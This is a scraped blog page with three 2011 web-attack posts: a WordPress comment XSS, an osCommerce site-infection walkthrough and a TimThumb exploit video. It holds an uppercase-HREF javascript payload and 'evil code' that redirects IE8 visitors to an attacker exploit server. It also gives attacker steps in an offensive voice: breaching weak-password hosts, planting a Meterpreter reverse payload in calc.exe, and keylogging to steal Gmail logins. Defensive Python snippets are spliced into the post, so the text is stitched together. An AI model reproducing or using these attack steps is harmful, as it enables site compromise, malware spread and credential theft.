<a href="http://2.bp.blogspot.com/-rNlbrrZ5K60/TrbDLefY3TI/AAAAAAAAAB8/OnOnRJD5wwE/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-rNlbrrZ5K60/TrbDLefY3TI/AAAAAAAAAB8/OnOnRJD5wwE/s1600/5.jpg" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-KuXIwZxRp6A/Tra8eAsRB8I/AAAAAAAAABU/TKCpBTGFBe0/s1600/trollface.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://4.bp.blogspot.com/-KuXIwZxRp6A/Tra8eAsRB8I/AAAAAAAAABU/TKCpBTGFBe0/s320/trollface.jpg" width="320" /></a></div>
<br />
After this e-mail I haven't got any response; maybe he is angry with me, but I don't know why :(.
<br />
<b>Wordpress XSS Vulnerability + IE 8 Exploit</b> (published 2011-11-01, updated 2012-04-04)<br />
On the 30th of December 2010 a guy named sneak reported a <a href="http://www.sneaked.net/persistent-xss-vulnerability-wordpress-303-ksesphp">persistent XSS vulnerability</a> that affects the popular blog CMS WordPress <= 3.0.3.<br />
<br />
The problem is located in the kses.php file, which is the HTML sanitization library. If we write a link with the href attribute in capital letters, this library doesn't filter the content properly.<br />
<br />
Example:<br />
<pre class="brush: xhtml"><a HREF="javascript:alert(0)">CLICK HERE</a>
</pre>
<br />
If we post it in a comment, this tag will be accepted as an ordinary link. With this vulnerability we can craft a piece of code that steals cookies, redirects to other sites, etc.<br />
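The class of bug here is a filter that matches attribute names case-sensitively while the browser treats them case-insensitively. The following Python snippet, an added example that is not part of the post and not kses itself, models that with two versions of a tiny href filter: the vulnerable one only inspects a lowercase <code>href</code>, so the post's <code>HREF="javascript:alert(0)"</code> passes through untouched; the fixed one matches the attribute name case-insensitively and normalises the URL (whitespace and control characters stripped, lowercased) before checking the scheme. The scheme list and function names are my own.

```python
import re

# URL schemes that execute script when used in an href (a representative list,
# chosen for this example; not kses's own configuration).
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")

# Same pattern twice; the only difference is the IGNORECASE flag.
_HREF_CASE_SENSITIVE = re.compile(r'href\s*=\s*"([^"]*)"')
_HREF_ANY_CASE = re.compile(r'href\s*=\s*"([^"]*)"', re.IGNORECASE)


def has_dangerous_scheme(url):
    """Normalise the URL before dispatching on its scheme: drop whitespace and
    control characters (browsers ignore them) and compare lowercase."""
    cleaned = re.sub(r"[\s\x00-\x1f]", "", url).lower()
    return cleaned.startswith(DANGEROUS_SCHEMES)


def _neutralise(match):
    # Replace the whole attribute with a harmless one when the scheme is dangerous.
    return 'href="#"' if has_dangerous_scheme(match.group(1)) else match.group(0)


def filter_links_vulnerable(html):
    """Models the bug: only a lowercase href attribute is inspected, so an
    uppercase HREF with a javascript: URL is passed through unchanged."""
    return _HREF_CASE_SENSITIVE.sub(_neutralise, html)


def filter_links_fixed(html):
    """Attribute names are case-insensitive in HTML, so match them that way."""
    return _HREF_ANY_CASE.sub(_neutralise, html)
```

A real sanitizer should parse the markup into tags and attributes rather than regex over the raw text, but the lesson is the same: the filter must compare names and schemes the way the browser does, which for kses meant lowercasing attribute names before the check.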
<br />
This video shows how easy it is for anyone to craft a malicious comment that redirects the victim to a server hosting an exploit for Internet Explorer 8 (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3971">CVE-2010-3971</a>).<br />
<br />
Our evil code:<br />
<pre class="brush: js">// Only redirect visitors whose User-Agent identifies Internet Explorer 8.
var s = navigator.userAgent;
if (s.search('MSIE 8.0') != -1) {
    window.location = "http://192.168.2.13:8080/news";
}
</pre>
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/BXmXEKfxZQc" width="640"></iframe><br />
<br />
Reference and more detailed information:<br />
- <a href="http://www.sneaked.net/">Sneak blog </a><br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training">Metasploit Unleashed</a><br />
- <a href="http://www.javascript-obfuscator.com/">Javascript Obfuscator</a>
<br />
<b>OsCommerce Malware Infection</b> (published 2011-10-04, updated 2012-04-04)<br />
Three months ago a huge site infection campaign started, targeting osCommerce, a famous CMS for small and medium on-line stores. This CMS suffers from a few vulnerabilities that can allow an attacker to upload files and execute remote code.<br />
<br />
Vulnerabilities:<br />
- <a href="http://www.exploit-db.com/exploits/15587">osCommerce 2.2 Remote File Upload Vulnerability</a><br />
- <a href="http://www.exploit-db.com/exploits/16113">osCommerce authentication bypass</a><br />
- <a href="http://www.exploit-db.com/exploits/16899">osCommerce 2.2 Arbitrary PHP Code Execution</a><br />
- <a href="http://www.exploit-db.com/exploits/17285">osCommerce 2.3.1 Remote File Upload Vulnerability</a><br />
<br />
Today (4/10/2011) the total number of infected sites is 830,000, but two months ago it was 8 million.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dLank5iNuVE/TonulIsQthI/AAAAAAAAAA4/yjEGAkRjnE4/s1600/result_google.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="155" src="http://1.bp.blogspot.com/-dLank5iNuVE/TonulIsQthI/AAAAAAAAAA4/yjEGAkRjnE4/s640/result_google.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
On some compromised sites the attacker has left the webshell behind.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-7RmFDHR6O4o/ToY8pS_zhCI/AAAAAAAAAAw/AkR-2P72FJc/s1600/lista_img_obscured.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="290" src="http://2.bp.blogspot.com/-7RmFDHR6O4o/ToY8pS_zhCI/AAAAAAAAAAw/AkR-2P72FJc/s640/lista_img_obscured.jpg" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-4XgEbuxZDAU/ToY48iklDpI/AAAAAAAAAAs/RmrS7uoQJV8/s1600/img_shell_obscured.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="http://3.bp.blogspot.com/-4XgEbuxZDAU/ToY48iklDpI/AAAAAAAAAAs/RmrS7uoQJV8/s640/img_shell_obscured.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
After uploading a backdoor, the attacker edits the home page and adds a script/iframe tag that loads multiple browser exploits.<br />
<br />
Exploits used:<br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">IE 6 Remote Code Execution</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840">Java Runtime Environment Remote Code Execution Vulnerability</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885">Microsoft Windows Help</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">Adobe Reader and Acrobat 8.x</a><br />
<br />
After successful exploitation, malware is downloaded and executed.<br />
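The injected script/iframe tag is what a site owner can look for. The following Python scanner, an added example that is not part of the post or of osCommerce, walks a page with the standard-library HTML parser and reports <code>&lt;script&gt;</code> and <code>&lt;iframe&gt;</code> tags that load from a host other than the site itself (or an allowlist), plus iframes styled to be invisible, which is how these injections usually hide. The sample page is constructed for the example (coolsite.dot is the malware host from the scenario above, 192.168.2.7 the store); class and function names are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectedTagScanner(HTMLParser):
    """Collect <script>/<iframe> tags that load from hosts other than the site
    itself (or an explicit allowlist) and iframes styled to be invisible."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.known = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return  # inline scripts need a different check; not covered here
        host = urlparse(src).hostname  # None for relative URLs
        reasons = []
        if host and host.lower() not in self.known:
            reasons.append(f"external host {host}")
        if tag == "iframe" and is_hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append((tag, src, reasons))


def is_hidden(attrs):
    """Heuristic: display:none / visibility:hidden, or a frame of 1x1 or smaller."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        return int(attrs.get("width", 100)) <= 1 and int(attrs.get("height", 100)) <= 1
    except ValueError:
        return False


def scan_page(html, site_host, allowed_hosts=()):
    """Return [(tag, src, reasons), ...] in document order."""
    scanner = InjectedTagScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed store home page with two injected tags (sample data, not from the post).
SAMPLE_PAGE = """<html><head>
<script src="/includes/general.js"></script>
<script src="http://coolsite.dot/jquery.js"></script>
</head><body>
<h1>My Store</h1>
<iframe src="http://coolsite.dot/news" width="1" height="1" style="display: none"></iframe>
</body></html>"""


if __name__ == "__main__":
    for tag, src, reasons in scan_page(SAMPLE_PAGE, "192.168.2.7"):
        print(f"<{tag} src={src}>: {', '.join(reasons)}")
```

Run against the sample page with the store's own host, it reports the external jquery.js script and the hidden 1x1 iframe pointing at coolsite.dot; the relative general.js is left alone. Hosts you legitimately load from (a CDN, a payment provider) go into allowed_hosts so that only unexpected third parties surface.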
<br />
<div align="center">
<b><span style="font-size: x-large;">VIDEO EXAMPLE</span></b></div>
<br />
<b>Scenario:</b><br />
- 192.168.2.13 ----> Attacker with BackBox 2.0<br />
- 192.168.2.7/os/ -----> Victim with osCommerce 2.2<br />
- http://coolsite.dot ----> Malware host<br />
<br />
- jquery.js (IE 6 Remote Code Execution <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>)<br />
- windows.exe (windows calculator with reverse meterpreter tcp payload)<br />
<br />
<b>Steps:</b><br />
What I want to show you is how an attacker has probably infected a site running an old copy of osCommerce to spread malware. These are the steps:<br />
<br />
1- Find a place where we can host our malicious code, so we need a server with a weak SSH/FTP password (coolsite.dot).<br />
<br />
2- Create our malware by injecting a Meterpreter reverse payload into calc.exe and encoding it 3 times with shikata_ga_nai.<br />
<br />
3- Wait for the connection back.<br />
<br />
4- Upload the malware and the exploit to coolsite.dot.<br />
<br />
5- Wait for a victim.<br />
<br />
6- Do what you want.<br />
<br />
After obtaining the Meterpreter shell, we start the keylogger to steal Gmail login credentials.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/NvPzHlQTdjo" width="640"></iframe><br />
Reference and more detailed information:<br />
- <a href="http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html">Willysycom mass injection ongoing</a><br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/">Metasploit Unleashed</a>
<br />
<b>Wordpress TimThumb Exploit (Remote Code Execution)</b> (published 2011-09-21, updated 2020-11-22)<br />
A lot of WordPress themes use the TimThumb script to resize images. From version 1.15 to 1.33, TimThumb allows external domains such as flickr.com to display remote images on your website.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/yIjjHByz9Pc" width="640"></iframe><br />
<br />
<br />
More detailed information here:<br />
- <a href="http://goo.gl/ZbHC0">WordPress TimThumb hack</a><br />
- <a href="http://goo.gl/DOWo8">Zero Day vulnerability in many wordpress themes</a><br />
<br />
Resources:<br />
- <a href="http://goo.gl/6Z9pO">TimThumb version used</a><br />
- <a href="http://goo.gl/KZfOO">Vulnerable wordpress theme</a><br />
- <a href="http://goo.gl/KR8xT">List of vulnerable wordpress themes</a><br />
<div>
<br /></div>